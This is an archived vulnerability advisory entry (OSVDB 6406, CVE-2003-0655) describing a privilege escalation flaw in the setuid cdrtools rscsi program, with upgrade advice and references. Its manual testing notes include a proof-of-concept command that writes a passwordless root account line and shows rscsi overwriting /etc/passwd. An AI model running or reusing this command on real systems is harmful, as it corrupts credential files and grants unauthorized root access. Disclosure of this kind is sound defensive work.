cdrtools rscsi Privilege Escalation

2003-08-01T00:00:00
ID OSVDB:6406
Type osvdb
Reporter KF(dotslash@snosoft.com)
Modified 2003-08-01T00:00:00

Description

Vulnerability Description

cdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a specially formatted string is passed to the rscsi program. This flaw may lead to a loss of integrity.

Solution Description

Upgrade to version 2.01a18 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

cdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a specially formatted string is passed to the rscsi program. This flaw may lead to a loss of integrity.

Manual Testing Notes

elguapo@gentoo elguapo $ echo Cecho -e "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a" | /opt/schily/sbin/rscsi /tmp/lala
Segmentation fault
(this segfault is not related to the security issue)

elguapo@gentoo elguapo $ cat /tmp/lala
rscsid: user id 1000, name elguapo
rmt: stdin is a PIPE
r00t::0:0:root:/root:/bin/bash

When attempting to echo this line to the password file we get the following error. Please note that the password file IS still overwritten at this point.

E0 Illegal user id for RSCSI server 0

elguapo@gentoo elguapo $ cat /etc/passwd
rscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server
rscsid:>E 0 (Illegal user id for RSCSI server) []

References:

Vendor URL: http://www.fokus.fhg.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html
Security Tracker: 1007368
Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=105978381618095&w=2
Keyword: suid
ISS X-Force ID: 12802
CVE-2003-0655
Bugtraq ID: 8328